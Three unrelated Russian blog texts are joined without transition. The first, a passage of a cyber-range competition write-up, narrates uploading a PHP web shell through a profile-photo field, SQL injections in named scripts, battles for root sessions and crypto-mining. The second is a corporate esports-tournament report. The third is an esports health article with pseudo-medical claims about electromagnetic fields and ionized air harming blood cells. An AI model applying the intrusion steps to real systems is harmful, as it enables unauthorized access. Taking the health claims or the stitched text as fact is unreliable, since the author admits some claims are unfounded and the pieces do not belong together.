Сказал про себя отлично, but not today!, закрыл дверь, открыл окна и продолжил исследовать хост, в надежде, что не сгорю или не задохнусь.

Вернемся к нашему объекту. После авторизации под студентом, можно редактировать свой профиль. Диоксид углерода сделал свое, и я решил просто загрузить php-файл вместо фотки студента:

Получилось. Да, все просто. Получаем заветный шелл:

Шелл у нас приватный и классный (спасибо @explorer), естественно, что местами лили и общедоступные шелы и забирали шелы у других команд или даже маскировали свой под легитимные страницы.

Было предпринято огромное количество попыток повышения привилегий полученного пользователя www-data. Но как назло - ядро свежее, кривых сервисов нет, все энумерации ничего годного не показали. Палить 0day эксплойты под последние версии ядра Linux было нецелесообразно, поэтому мы решили пойти иным путем.

Так как шелл у нас приватный и классный, через пару нажатий кнопок в интерфейсе, я скачал исходный код системы OCR. BugBounty программа The Standoff принимала уязвимости типа SSRF, XXE, LFI/RFI, RCE, SQL-injection. Открыв код системы, я понял, что сейчас на нашей улице будет праздник, если не сгорю :-).

Так можно продолжать еще на две страницы, если не больше. Везде ничего не фильтруется. Сколько уязвимостей видите в приведенном участке кода из файла checkavailability.php? Я вижу один. А в edit-course.php? Тоже один? Я вижу четыре. Точно так же в course.php вижу четыре SQL-инъекции, а в student-registration.php вижу еще две. Чисто технически, уязвимость каждого параметра каждого скрипта - это отдельная уязвимость. Несложная арифметика 1+4+4+2=11. Считайте уже 11*150=1650 баллов у нас в кармане. И это только начало. Просто покажу список отправленных репортов только по этому хосту и только по SQL-injection:

Да и были конечно моменты, от которых горело не только в подъезде но и в душе, когда брали вектор, нас выпуливали, мы не сдавались и бились до конца, но иногда включались или организаторы или защитники и правили код, убирая уязвимости напрочь. Таких случаев было не мало и каждый совершенно различен, но вот просто очень охото, чтобы Вы это прочли и поняли каково это.

Изложение матное и дико увлекательное про хост 10.126.80.187 от Олега (@undefi)

Изначально, там был сервис с двумя уязвимыми файлами. Первой нашли читалку файлов, через которую прочитали исходники и нашли второй файл с RCE.

Скрипты выполнялись от рута. Залились на хост, пытались с него пробиться в локалку, но у него не было доступа. Залили агента, залили себе шелл на будущее для майнеров и пошли дальше.

Спустя какое-то время вернулись к хосту и обнаружили, что нас выкинули. Залились снова, спрятали шелл. Мура начал изучать хост, нашёл шелл другой именитой команды, выкинули их. Увидели, что шелл льётся снова, и то, что противники закрепились по крону, заблочили им каталог для залива. И снова мы оставили хост до лучших времен.

Пошли тренировать навыки на KoTH (http://personeltest.ru/aways/tryhackme.com/games/koth)

Когда настала пора майнеров, мы вернулись к хосту и обнаружили что? Правильно похекеров! Во-первых, нас снова выкинули. Во-вторых, уязвимость с RCE запатчили. Кто это был, красные или синие, нам неизвестно. Но запатчили красиво - повесили на уязвимый параметр экранирование (escapeshellargs()).

Но читалка файлов осталась.

Ранее, изучая хост, мы нашли там ещё веб-сервисы. Стали изучать через читалку и обнаружили ещё один уязвимый файл с RCE. Но картину нехило так портил WAF. Но, мы ребята не простые, поэтому щёлкнули этот файрволл и смогли залиться на хост. И вот тут начинается весь фатал-карнавал.

Заваливаемся с Мурой на хост, после стандартные команды: w, ps. А там швах: 7 или 8 рутовых ssh сессий, куча бэк коннектов. Зовём на помощь зал - Кролика, Богдана и говорим, что сейчас будет битва :)

Одновременно коннектимся к хосту, меняем рутовый пароль, начинаем рубить бэкконнекты и рвать рутовые сессии. В то же мгновение кто-то подключается снова. Снова выкидываем, одновременно судорожно пытаемся искать шеллы.

Кто-то кидает броадкаст сообщение через wall в духе: плохиши, хватит выкидывать. Выкидывают нас, мы снова заходим, идёт борьба на лучший пинг и самые быстрые пальцы.

Отрубаем bash у рута, видим, что есть ещё юзеры типа rooot, ro0t и учётки, похожие на орговские. Дропаем всех, но коннекты продолжаются. Отрубаем авторизацию ssh по паролю, меняем порт, Мура генерит ключ и на какое-то время это помогает. Выдыхаем.

В это время в чате капитанов начинается бугурт.

Мы расслабляемся, ищем неспешно шеллы, находим снова уже знакомый нам шелл, окончательно его вычищаем, заливаем агента и смотрим дальше. И тут нас выпуливают, закрывают порт ssh и дропают агента. Я так понимаю, это были организаторские властелины или те, кто увёл учётку у них.

В чате капитанов продолжается холивар, все кидаются жалобами друг в друга, мы материмся в дискорде, обстановка напряжённая, но разрядку внёс один из капитанов мемчиком.

Несколько часов спустя хост вернулся в строй после реверта, но как-то странно. Системные настройки вернули, а вот скрипт с RCE как был экранирован, так и остался до конца.

Благо, что мы нашли другую уязвимость, снова залились и просто на нём майнили и юзали, как прокси для обхода WAF на другом хосте.

Всегда стоит вернуться время спустя и root в кармане

Когда сдавали последние отчеты по данному хосту, в личные сообщения нашего капитана Тимура (@BadBlackHat) написал Михаил Левин:

Но мы хотели еще. Только дальше не получилось, так как кто-то начал удалять базу данных хоста, причем через крон. Любая попытка восстановить базу в тот же момент проваливалась. Кто бы это не был, это было очень жестоко, но с одной стороны полезно для нас, так как мы уже успели сдать много уязвимостей. А дальнейшая судьба хоста нас мало волновала. На тот момент, сама статистика сданных уязвимостей на сайте The Standoff уж точно взбудоражила другие команды:

Кстати, после The Standoff ко мне постучался сосед и сообщил, что я его топлю. Я просмотрел все места в ванной и не нашел источник, показал соседу. Он побежал на этаж выше. Источник был там. Оказывается моя квартира выступила как прокси для соседа выше, чтобы тот затопил соседа подо мной. Так что, можно смело сказать - огонь и медные трубы я прошел.

А турнирная таблица выглядела так:

Вы скажете всего лишь третье место, а я скажу всего лишь расслабленные соперники. Об этом в хитростях, в следующей мини-главе. А мораль сей басни - если есть возможность, всегда скачивайте исходники для ручного анализа.

#Хитрости

Любой нами отправленный баг в BugBounty программу почти моментально фиксился, не оставляя шансов на закрепление. Иногда просто отрубали весь сервис, иногда удаляли весь уязвимый скрипт, иногда забрасывали все под фаервол. Да, правильных патчей было мизерное количество. И тут мы начали задумываться, а зачем гонятся за баллами в BugBounty, если это отрезает нам путь для дальнейшего исследования инфраструктуры? Какая разница, на какой строчке мы находимся в турнирной таблице, если важна только конечная позиция? Ведь хорошо смеется тот, кто смеется последним.

И тут в общем чате для репортов начались появляться такие репорты:

Думаю, суть ясна. Отчеты можно было сдать в самом конце, дав соперникам возможность расслабиться. Но правда реализованные риски все равно вывели нас на первое место, и запас был почти бесполезен, но укрепил нашу позицию. Были и другие козыри в виде большого количества захваченных хостов на инфраструктуре, но об этом в сл. части.

# До встречи в SCADA

Пишу на правах вице-капитана (@clevergod) отступление к 3-й и самой огромной и невероятно захватывающей части.

Таких ситуаций за 5 суток, чистым материалом набралось вагон и маленькая тележка и поверьте затронутые в статье вещи, никогда не опишут самого процесса участия. Инфраструктура менялась на ходу и была очень большой и не статичной. Замечаете разницу наших статей от статей, поданных другими командами с прошлых PHDays? Мы всегда мечтали почитать подобный материал, для простых ребят, чтобы не читалось, как статья вендора или газета Правда. Мы хотим лишь доступно пояснить все, что мы переживали, какие были эмоции, трудности, успехи, что приходилось делать для победы и что у каждого из нас были помимо битвы семейные и рабочие дела, различные ЧП. Но не смотря на все это, мы ни разу не повздорили и старались выйти из даже самых трудных или тупиковых ситуаций. В следующей части, надеемся заключительной, мы опишем инфраструктурный процесс. Как мы брали хосты, как боролись с другими командами за звание короля горы, как нас переполняли эмоции при регулярном отлупе, как мы развернули самую масштабную майниг-ферму и многое другое. Вместо тысячи слов, подогревая интерес, покажу, что Вас ждет дальше.

Хотим от всей команды попросить организаторов не менять условия участия на кибер-полигоне и не переносить ИС в локальный режим, мы на удаленке отлично играли и собраться всем в одном месте на 5 суток будет крайне проблематично. А еще огромная просьба, реализовать окончание кибер-битвы за день до конца мероприятия, мы очень хотим посмотреть на доклады.

До начала пандемии мы регулярно устраивали мероприятия в офисе. Поздравления именинников, 23 февраля и 8 марта, Хэллоуин, турниры по спортивному покеру, вечеринки в честь релизов... А на удалёнке поддерживали командный дух дистанционно: наши ребята участвовали онлайн в кулинарных мастер-классах, челленджах, викторинах, квизах и конкурсах.

Идея кибертурнира появилась не спонтанно. Мы всегда открыты к новым форматам взаимодействия внутри коллектива, а коммуникация в онлайн-играх бывает не менее интенсивной, чем в более традиционных видах тимбилдингов. Но главное, инициативу поддержали сами коллеги: благодаря опросу мы убедились, что киберспорт в нашей компании интересен многим.

Привет, Хабр! Меня зовут Мария Зернова, я менеджер отдела внутренних коммуникаций и корпоративной культуры МойОфис. Наша команда отвечает за работу с HR-брендом, мероприятия, информирование коллег, уровень их вовлеченности и в целом счастье сотрудников.

Мы никогда не придерживались идеи движуха ради движухи, поэтому в условиях пандемии ставили перед собой вполне конкретные цели: сплотить кроссфункциональную команду и найти новую площадку для неформального общения, чтобы собраться вне работы, пусть даже удаленно. Чемпионат по киберспорту состязание сотрудников в популярной компьютерной игре показался нам отличным способом решить актуальные задачи и воодушевить коллектив. Вот как проходила наша первая организация этого события.

Начало. Работа с пожеланиями

Что необходимо сделать перед запуском любой развлекательной активности для коллег? Разумеется, уточнить, нужно ли им это. При положительном ответе предоставить опции. Так что первым делом мы провели опрос-голосование на тему "интересен ли вам в принципе чемпионат по киберспорту", попросили выбрать одну из игр (потенциальных дисциплин), указать приоритетные даты и время. Около 10% респондентов (это 60 человек) откликнулось в пользу проводить, и эта цифра показалась нам достаточной, чтобы начать подготовку.

Пообщавшись с сотрудниками-любителями онлайн-игр, мы составили список возможных дисциплин для турнира: Counter-Strike: Global Offensive, DOTA2, Hearthstone, Fortnite, PUBG Mobile, Mobile Legends. Чемпионаты по этим известным многопользовательским играм успешно проходят сегодня по всему миру.

Часть коллег предрекала победу Counter-Strike или DOTA2 одной из наиболее популярных высокоинтенсивных игр с тактическим элементом. Кто-то из ребят даже сравнил их с футболом и хоккеем классические, понятные и знакомые большинству состязания, куда без них? Прогнозы оказались близки к истине: лидером голосования со значительным отрывом стала Counter-Strike, второе место досталось DOTA2. "Бронзу" получила Heartstone, карточная онлайн-игра по вселенной Warcraft.

Подготовка команд. Формат турнира

В организации нам помогал центр киберспорта click-storm: логично и удобно было советоваться с теми, кто постоянно проводит подобные турниры, осведомлен в теме и может ответить на любые вопросы. Подрядчик также обеспечил техническую поддержку события.

На участие в турнире можно было записаться в составе уже сформированной команды либо же довериться случайному распределению, что в плане командообразования тоже оказалось отличным вариантом. Когда мы собрали кворум, то провели для ребят вебинар с организаторами: в рамках этого мини-ивента участники освежали в памяти игру (если требовалось), привыкали к платформе и заранее регистрировались. Каждая команда назначила себе капитана коллеги сами сделали выбор. Разумеется, завели чат для общения.

Турнирным форматом выбрали Double Elimination. Это компромисс между круговой системой (каждый сражается с каждым) и олимпийской сеткой (с выбыванием после первого поражения). Такой формат позволяет проиграть один раз и не выбыть из игры, но в то же время не затягивает турнир, как это возможно при круговой системе: наш чемпионат длился в итоге не более пяти часов.

Низкий старт. Регистрация, серверы, стриминг

На каждом этапе организации была предусмотрена своя форма коммуникации с сотрудниками: голосование за игру на корпоративном портале, запись в команду (в общем документе), публикация информации о времени и месте, приглашение на вебинар и на саму игру. Напоминание о событии мы несколько раз отправляли как участникам, так и потенциальным болельщикам многим коллегам оказалось интересно посмотреть ход сражений.

Для регистрации на площадке достаточно было залогиниться через любую удобную социальную сеть в один клик, далее привязать Steam-аккаунт. Это позволяло проверить соответствие никнейма в игре с пользователем на площадке, убедиться, что никто не использует забаненный игровой аккаунт. После старта турнира на платформе автоматически открылись чаты между командами. Судьи выдавали реквизиты турнирных серверов.

Турнирные серверы одна из самых важных деталей чемпионата. Очень важен низкий пинг и высокий тикрейт сервера. На платформе были специально настроенные турнирные серверы со 128-битным тикрейтом. Скорость обработки информации вдвое выше, чем у обычных серверов. Это позволяло быстрее засчитывать выстрел и значительно повышало удовольствие от игры.

Трансляция на Twitch или YouTube важный элемент корпоративного кибертурнира, если на нем предусмотрены зрители. Речь об аналоге спортивного матча в прямом эфире с комментированием. Мы выбрали Twitch. На стрим пригласили опытного комментатора и фаната Counter-Strike, который легко и динамично рассказывал о ходе игр. Важно было, чтобы комментатор с уважением относился к участникам и отдавал себе отчёт, что сопровождает непрофессиональный турнир; выделял лучшие моменты, подбадривал и заряжал игроков. Как мы впоследствии узнали из отзывов, работой выбранного нами профессионала сотрудники остались очень довольны.

Отклик участников и общие итоги

Наш первый кибертурнир в целом состоялся удачно: был очевиден опыт большинства игроков, все так или иначе уже играли в CS и освоились в Global Offensive довольно быстро. Атмосфера сложилась позитивная, весело было даже тем командам, которые проигрывали.

Ребята высоко оценили активность те, кто по их собственному признанию не играли в CS лет десять, ощутили приятную ностальгию. Новичкам периодически не хватало подготовки (тут мы поставили для себя галочку): встречались вопросы в духе не понятно, где консоль, что такое банан и т.д. Были и те, кто попросил на будущее составлять графики турниров, чтобы можно было поработать в паузах между матчами.

Чуть позже мы провели второй турнир по CS: GO. В его процессе стало хорошо заметно, что коллеги уже полностью освоились с сайтом, игрой, и все в этот раз знают, что им нужно делать. По сравнению с прошлым чемпионатом серьезно повысился упор на командную работу.

Запись с нашего второго корпоративного турнира:

С удовольствием почитаю о вашем личном опыте организации тимбилдингов в режиме удаленки. Если у вас есть интересные примеры, обязательно расскажите о них в комментариях!

И её киберспортивная специфика

<sup>Подавая сигналы в рог,
Будь всегда справедлив, но строг.
(с) Козьма Прутков</sup>

В связи с относительной спонтанностью зарождения и спецификой развития компьютерного спорта гигиене труда киберспортсмена до сих пор не уделяется должного внимания. Вместе с тем сама киберспортивная деятельность (МКМ - мышь, клавиатура, монитор), из-за специфики спортинвентаря, всё ещё мало отличается от офисной работы за компьютером. Таким образом компьютерный спорт максимально обостряет скрытые в офисной работе моменты негативного влияния деятельности на здоровье человека, т.к. не сильно отличаясь от таковой технически, гораздо более интенсивен в плане непосредственных нагрузок на организм. Потому описанные ниже моменты могут быть наиболее полно проиллюстрированы именно на киберспортивных примерах раскрывая офисно-гиковскую специфику в целом.

Сбор материала для статьи начался в 2016 году. Первоначально работа задумывалась в качестве некоего пособия для подготовки киберспортсменов, но от такого формата было решено отказаться в пользу статейного.

В процессе написания выяснилось, что некоторые ключевые моменты подготовки и отбора киберспортсменов не то что не проработаны должным образом, а даже и не затронуты в печати. В связи с этим, прежде чем продолжить работу, автору пришлось опубликовать ряд статей и заметок на тему физподготовки и отбора спортсменов в киберспорте чтобы маленько прощупать почву. Прощупывание кое-что показало, но сейчас это не так уж и важно. Однако было принято решение изменить акценты и переориентироваться на гик/айти аудиторию в целом, т.к. сегодня и киберспортсмены и айтишники находятся в схожих рабочих условиях и подвергаются практически идентичным негативным влияниям рабочей среды.

Материал разбит на две основные части. Первая представляет собой подробный разбор проблематики, известной автору. Предпринята попытка наиболее точно и чётко сформулировать причины и следствия описываемых явлений. Вторая же часть состоит из описания максимально эффективных на взгляд автора способов решения описанных в первой проблем.

Автор выражает благодарность Александру Фёдоровичу Горбаченко за ряд ценных советов по финальной доработке статьи.

1. Проблематика

<sup>Все хотят быть здоровыми, но никто этого не соблюдает.
(с) Козьма Прутков</sup>

<sup>Труд может быть тяжёлым не потому, что слаба его механизация, а потому, что условия, в которых он протекает, предъявляют серьёзные требования к организму человека и его физиологическим резервам.
(с) Физические нагрузки современного человека НАУКА (1982), В.П.Загрядский, З.К.Сулимо-Самуйлло.</sup>

Работа за компьютером представляет собой операторскую деятельность, которая почти целиком определяется устройствами ввода-вывода. Самыми массовыми и общеобиходными до сих пор являются мышь, клавиатура и монитор, что, однако, влечёт за собой ряд проблем, так как тогда, когда их эргономический концепт окончательно сформировался, ещё не было такого фронта работ за компьютером! Количество времени, проводимого перед мониторами значительной частью населения развитых стран, делает невозможной удовлетворительную индивидуальную адаптацию к условиям деятельности и однозначно требует пересмотра и переустройства самой рабочей среды как в плане эргономики рабочего места оператора, так и в самой аппаратной части устройств ввода-вывода.

В случае, когда речь идёт о программистах, подразумевается, что ценность специалиста возрастает со временем когда он накапливает профильный опыт и знания. Однако в текущих условиях время и опыт автоматически означают снижение трудоспособности, т.к. длительная работа по специальности неизбежно приводит к развитию профессиональных заболеваний, большей части которых можно в принципе избежать адаптировав рабочую среду и устройства ввода-вывода должным образом! То есть сегодня речь идёт о хроническом снижении производительности труда в данной области, т.к. общее состояние здоровья оператора напрямую сказывается на его работоспособности!

Если же взглянуть с этой точки зрения на компьютерный спорт, то нарисуется ещё более печальная картина. Использование офисной оргтехники для интенсивной тренировочной и соревновательной деятельности приводит к развитию профессиональных заболеваний гораздо быстрее и эффективнее, чем неспешная работа в офисе или вдумчивое программирование за чашечкой чая/кофе.

Регулярные, длительные сессии за компьютером затрагивают как дыхательную и основные регуляторные системы, так и опорно двигательный аппарат в целом.

Рассмотрим же проблематику поближе!

Ah shit, here we go again.

1.1 Общая хроническая гиподинамия и гипокинезия

<sup>Но если медики рассматривают гипокинезию как болезнь, то физиологи труда считают её особым видом работы, заключающейся, с одной стороны, в активном подавлении двигательной активности, а с другой в длительном поддержании фиксированной рабочей позы. Последствия ограниченной подвижности многообразны и отрицательны. Человеческий организм становится уязвимым по отношению к внешним воздействиям; его физиологические системы, призванные снабжать ткани кровью, кислородом, питательными веществами, работая на экономном режиме малой подвжности, начинают утрачивать присущие им свойства быстрого и целесообразного реагирования.
(с) Физические нагрузки современного человека НАУКА (1982), В.П.Загрядский, З.К.Сулимо-Самуйлло.</sup>

В норме скелетная мускулатура составляет не менее 55% массы тела. Её сокращения важная часть системы периферийного кровообращения. Сокращающиеся мышцы помогают сердцу проталкивать кровь по венам. При ритмичных движениях ходьбе, беге, трудовой деятельности и т. д. расположенные между мышцами или между мышцей и костью крупные вены с клапанами периодически сдавливаются, а содержащаяся в них кровь направляется в сторону сердца, что получило название мышечного насоса, или, точнее, венозной помпы. (подробнее см. работу Н.И.Аринчина "Периферические "сердца" человека" (1988))

Кроме того, имеет место микронасосная деятельность скелетных мышц при их растяжении. Присасывающе-нагнетательная функция обусловлена главным образом биомеханическим воздействием мышечных волокон на внутримышечные сосуды в основном капилляры. (подробнее см. работу Н.И.Аринчин, Г.Ф.Борисевич "Микронасосная деятельность скелетных мышц при их растяжении" (1986))

Таким образом мы оказываемся в логически неочевидной ситуации, когда сердечно-сосудистая система человека, подверженного гиподинамии и гипокинезии, хронически перегружается отсутствием достаточной двигательной активности! Умеренная и регулярная физическая нагрузка облегчает работу сердечно-сосудистой системы ритмичными сокращениями мышц.

Застой венозного оттока и лимфы в нижних конечностях на фоне хронической гиподинамии:

К этому прибавляется фактор дегенерации капиллярной сети в отсутствии необходимых физнагрузок. Дело в том, что организм постепенно разбирает капилляры скелетной мускулатуры гиподинамичного человека до уровня минимального необходимого обеспечения тканей. Падает и количество митохондрий в мышечном волокне то есть функциональные возможности мышечной ткани в целом, т.к. митохондрии являются как раз теми самыми мелкими, универсальными таракашками, которые покушав какают в клетки энергией! Причём в состоянии делать это на разных видах топлива и с использованием разных окислителей!

Далее из-за лени автора и бесполезности этой информации для читателя опущен кусок заумного текста, который описывая сложные адаптационные механизмы организма не имеет по своей сути никакой значимости в рамках данной статьи, т.к. фармакологически допинговать данные системы без физнагрузки не имеет смысла в связи с тем, что рост капилляров сложным образом запускается именно ей. А на фоне физнагрузки такое допингование не имеет смысла и подавно, т.к. необходимые кондиции достигаются естественным путём, благо наш оператор ЭВМ не стремится к олимийским рекордам. Попытавшись же без должных знаний и опыта он может внезапно ворваться в перетренированность (декомпенсацию по имунной системе), при помощи которой природа мягко поправит взгляды на жизнь нашего супермена. Интересующиеся могут почитать о физической нагрузке как причине вторичного иммунодефицита.

Если же говорить непосредственно о соревнующихся киберспортсменах - для них, острее чем для прочих, встаёт вопрос адреналина. Если в классическом спорте предстартовая лихорадка, в большинстве дисциплин, разрешается интенсивными сокращениями мышц, то наш кибератлет вынужден неподвижно сидеть на стуле на пике "мандража". Таким образом единственная мышца, в которой может хоть как-то прогореть выброшенный в кровь адреналин это миокард. Адреналиновые нагрузки, не разрешившиеся существенной активностью скелетной мускулатуры весьма негативно сказываются на работе сердца и надпочечников - особенно в долгосрочной перспективе.

Под действием адреналина весьма усиливается процесс свёртывания крови (Adelson (1961)), что эволюционно рассчитано на ранения во время конфликтов. А также сжимаются сосуды в брюшной полости и кое-где ещё (например наполнение пещеристых тел), что, в конечном счёте, означает необходимость для сердца толкать этот готовый свернуться компот изо всех сил - без каких бы то ни было мышечных сокращений на фоне. В связи с чем автор предсказывает у всех регулярно соревнующихся и соревновавшихся киберспортсменов существенную гипертрофию левого желудочка сердца (ГЛЖ). В этой же области мы без труда найдём объяснение фокусам с артериальным давлением во время ответственных, напряжённых матчей.

В нашем же компьютерном случае картина маслом может быть дополнена ещё одним любопытным пунктом.

1.2 Электромагнитная экспозиция + катионизация вдыхаемого воздуха

Гиподинамия приходит к незадачливому оператору не одна. Её ближайшими сестрёнками являются длительная экспозиция операторского организма электромагнитным излучением, а также изрядная катионизация (положительная ионизация) вдыхаемого оператором воздуха особенно компьютерами с воздушной системой охлаждения.

Пребывание в ЭМ-полях (см. работу "О влиянии электромагнитных полей на свойства эритроцитов" Пиротти Е.Л. (1997)) ведёт к нарастанию агглютинации эритроцитов (не станем забывать, что для киберспортсмена имеет место ещё и повышенный уровень адреналина) - когда полярность их мембран меняется, что приводит к их развороту и склеиванию в т.н. "монетные столбики", которые, в отличии от одиночных эритроцитов, имеющих свойство складываясь протискиваться в мельчайшие сосудики уже не пролезают в мелкие капилляры, таким образом ухудшая транспорт кислорода в тканях. В т.ч. и в мозге!

Расположение эритроцитов в просвете сосуда:

Наблюдательный читатель наверняка замечал у себя резкое замерзание конечностей через несколько минут после начала работы за компьютером в холодном помещении, в то время как при той же температуре, в том же помещении и в той же одежде ничего подобного не наблюдалось "ни сидя, ни лёжа, ни стоя" до начала работы и некоторое время спустя после. Пожалуй самый наглядный пример нарушения микроциркуляции на периферии, который автор взял неизвестно откуда.

Наложив это на дегенерацию капиллярной сети мы получим достаточно удручающую картину, которую нам любезно и не таясь демонстрирует небезызвестный Данил Ишутин в работе "Говорит и показывает Ишутин" (2020).

Автор этих строк так же голословно заявляет, что после нахождения в "компьютерной комнате" аэробный порог резко снижается на некоторое время даже у тренированных спортсменов. В этой связи, с накоплением определённого статистического массива, можно даже не спрашивать молодого спортсмена, внезапно провалившегося по аэробной выносливости, как он отдыхал перед тренировкой.

Так же голословно заявим, что некоторые напряжённые операторы частенько испытывают затруднения в работе, связанные с внезапно участившимися после начала работы за компьютером позывами к мочеиспусканию. Что в нашем случае связано со стремительным подъёмом артериального давления.

Любопытный читатель для расширения кругозора может ознакомиться со статьёй на смежную тему, часть материала для которой подсказал автор этих строк.

* * *

По поводу ионизации воздуха в рабочем помещении, а вернее его катионизации, нужно учитывать, что длительно работающие электрические приборы практически исключают отрицательную ионизацию воздуха в помещении. Аэрионы, как более подвижные, перемещаются по силовым линиям полей, стремясь к противоположно заряженным поверхностям, где происходит их нейтрализация. Системный блок работающего компьютера с этой точки зрения является установкой по катионизации воздуха, т.к. большинство современных систем имеют воздушное охлаждение, что подразумевает постоянную прокачку воздуха сквозь "самую мякотку". Атмосфера в недостаточно проветриваемом помещении начинает всё больше "накаляться" и всё сильнее отличаться от таковой в окрестностях водопада или высокогорной сосновой рощи...

Эритроциты, захватывающие такой воздух в лёгких, массово меняют заряды мембран, что означает их ещё более интенсивную агглютинацию. Интересующийся читатель может самостоятельно углубиться в вопрос, после чего наложить полученные знания на выше- и, отчасти, нижеописанную проблематику.

1.3 Мелкомоторная блокировка дыхания (*далее МБД)

Глубокое, полноценное дыхание вносит прецессионную погрешность в высокоамплитудные мелкомоторные операции, что было относительно подробно рассмотрено в работе "Мелкомоторная блокировка дыхания в компьютерном спорте" (2019). В связи с чем оператор часто и подолгу рефлекторно задерживает дыхание ради точности выполнения мелкомоторных операций. Вместе с вышеперечисленным ровное, полноценное дыхание способствует и лимфотоку. Сокращения диафрагмы стимулируют отток лимфы через передние медиастинальные лимфатические узлы, которые расположены непосредственно на диафрагме, задние медиастинальные и поддиафрагмальные лимфатические узлы. Кроме того сокращения диафрагмы способствует насасыванию лимфы в грудной проток. В чём собственно и состоит супер-дупер секрет брюшного дыхания в восточных оздоровительных практиках и боевых искусствах.

<sup>Грудной проток [ductus thoracicus] основной коллектор лимфатической системы, по которому лимфа оттекает в венозное русло от нижних конечностей, таза, стенок и органов брюшной полости, левой половины груди и расположенных в ней органов, а также левой половины головы и шеи, левой верхней конечности.</sup>

Лимфа движется за счёт действия окружающих мышц на лимфатические сосуды и колебаний внутригрудного и внутрибрюшного давления за счёт дыхания. Таким образом проблема гиподинамии, гипокинезии и низкой интенсивности дыхания подразумевает ещё и застой лимфотока! Увеличение жировой прослойки усугубляет явление, т.к. жировая ткань омывается лимфой в отсутствии мышечных волокон, сокращение которых могло бы лимфотоку помочь.

Мелкомоторная блокировка дыхания актуальна и при обыкновенном печатании на клавиатуре, но, в этот момент, как правило, происходит ещё и артикуляционное сопровождение - беглое, поверхностное проговаривание про себя набираемого текста. И МБД же выводит нас на проблемы с опорно-двигательным аппаратом.

1.4 Опорно-двигательный аппарат

<sup>О большой функциональной нагрузке двигательного анализатора в процессе поддержания вынужденной позы говорит резкое уменьшение выносливости человека к статическим нагрузкам. После статического напряжения способность человека к мышечному расслаблению ухудшается, на что указывает усиление электрической активности покоящихся мышечных групп. В царской армии статическое напряжение использовалось как наказание, когда солдата с полной выкладкой ставили под ружьё и держали до тех пор, пока он не терял сознание.</sup>

<sup>Длительно и часто повторяющиеся статические усилия вызывают сужение сосудов. При ритмической работе мышц предплечья, осуществляемой на фоне статического напряжения мышц плечевого пояса происходит ухудшение кровоснабжения работающих мышц, ведущее к быстрому развитию утомления.
(с) Физические нагрузки современного человека НАУКА (1982), В.П.Загрядский, З.К.Сулимо-Самуйлло.</sup>

Длительное, регулярное использование мыши и клавиатуры проявляется стойкой характерной деформацией ОДА, отчасти продиктованной МБД.

Объём деформирующей нагрузки таков, что не может быть компенсирован упражнениями и прочей порнографией вроде рекомендаций по верной посадке перед компьютером и т.п. Рекомендации по поддержанию "верной" позы несостоятельны в принципе, т.к. человек не в состоянии просидеть неподвижно не меняя положения оси позвоночника относительно гравитационного вектора более нескольких минут. Вместе с этим имеет место проблема гипокинезии, которая исключает длительное "правильное" сидение перед монитором вообще. Экспериментатор, задавшийся такой целью и отснявший хотя бы час игровой сессии увидит во время скоростного воспроизведения записи, что сидящий киберспортсмен (оператор) занимается по сути постоянным ёрзаньем и переваливанием справа налево и обратно. Многократная, избыточная дублированная нагрузка на задействованные системы исключает применение на практике каких бы то ни было красивых заумных систем упражнений, призванных компенсировать деформирующий фактор. Можно сколько угодно вправлять, править, закачивать, тянуть и любым другим образом мучать перегруженные места, однако после посадки за компьютер и начала непосредственной деятельности произойдёт переключение сознания и моментальное выпадение этих мест из сознательного контроля в течении нескольких секунд, вместе с чем тут же отвалится и вся проделанная работа - а "проработанные" места вернутся в выработанное ранее максимально адаптивное состояние. Сознательный контроль по некоторым биомеханическим векторам слишком труден и отнимет всё внимание - исключая возможность осознанно выполнять внутриигровые манипуляции, а по некоторым невозможен, т.к. блокируется спецификой работы рефлекторных регуляционных механизмов (например МБД и её деформирующим влиянием на ОДА).

Читателю наверняка знакомо чувство странной тяжести при выходе из воды после плавания. Это следствие глубокого расслабления мелких мышц рефлекторно реагирующих на гравитацию и не подвластных сознательному контролю. Ещё читатель, длительно промышляющий, за компьютером может ощупать свои грудинно-ключично-сосцевидные мышцы и убедиться, что на стороне мыши она в гипертонусе. Ещё такой читатель может обратить внимание на разную высоту плеч или горб справа на спине, а также на болезнь Шляттера в локтевых суставах многих кибератлетов. Всё это следствия длительного манипулирования мышью и клавишами на столе.

Взглянём же на характерные симптомы!

Ай малядес! Писталет дэржит!

Из-за МБД (читай из-за мыши) splenius capitis, levator scapulae, а также trapezius особым образом выключаются из поддержания позы, что существенно перенапрягает на этой же стороне sternocleidomastoideus! Лица наших незадачливых операторов начинают плыть весьма характерным образом - слева череп тянет назад, а справа вперёд. Репу ведёт весьма характерно, на фоне чего рано или поздно начинает "свистеть фляга", т.к. крово- и лимфоток в черепе слегка меняется.

Маска как нельзя кстати и подчёркивает описываемый феномен.

И вот наш бочёк потик, дыхательная функция правого лёгкого практически сошла на нет, а полноценное кровообращение в печени затруднилось.

Однако вал симптоматики начинает только нарастать. Наши коровы пасутся даже в стойле!

Выпас в монитор для человека морфологически неестественен, следовательно может без последствий продолжаться лишь некоторый период времени в режиме компенсации.

Мммууу! (мычит коровка)

Чтобы довести себя до сжатия собственного спиного мозга позвонками нужно, воистину, обладать колоссальной киберспортивной гиперусидчивостью! Возможно, иногда это связано с тем, что свист канистры заглушает голос разума... Блокирование естественной вегетативной функциональности в угоду гиперусидчивости до добра никогда не доводит. Природа строга!

На этом месте не по годам смекалистый, но очень возмущённый читатель заорёт: "Вы всё врёти! Для этого есть специальные игровые кресла!"

Такого Шерлока Холмса мы пригласим взглянуть на две следующие иллюстрации:

Увы...

Все так называемые "игровые кресла" разработаны на основе гоночных (либо авиационных) сидений, что легко проверить через поисковик. Они мало пригодны для киберспортивной деятельности и с технической точки зрения ничем не отличаются для киберспортсмена от деревянного табурета.

При разработке этих кресел инженеры гнули свою линию, не беря в расчёт, что в процессе сидения за компьютером инерционные силы, вжимающие гонщика/пилота в сидение, отсутствуют!

Несмотря на то, что кресла такого типа действительно неплохо поддерживают спину во время скоростной езды, они абсолютно бесполезны во время напряжённой работы за компьютером.

Ни на одной фотографии с турниров или тренировочных сборов мы не наблюдаем опирание затылком на спинку кресла. Более того, мы не наблюдаем такового опирания в процессе киберспортивных схваток в принципе.

Таким образом наш атлет (оператор ЭВМ) мало того, что начинает угрожать пережатием собственному спинному мозгу, так ещё и начинает себя душить - своим же собственным позвоночником пережимая себе гортань!

А это в свою очередь означает постоянное апноэ, то есть невозможность рефлекторно, свободно дышать без сознательного контроля гортани и шеи! И невозможность входить в фазу быстрого сна лёжа на спине. А это ж....!

Наш оператор не может полноценно расслабиться днём и нормально выспаться ночью.

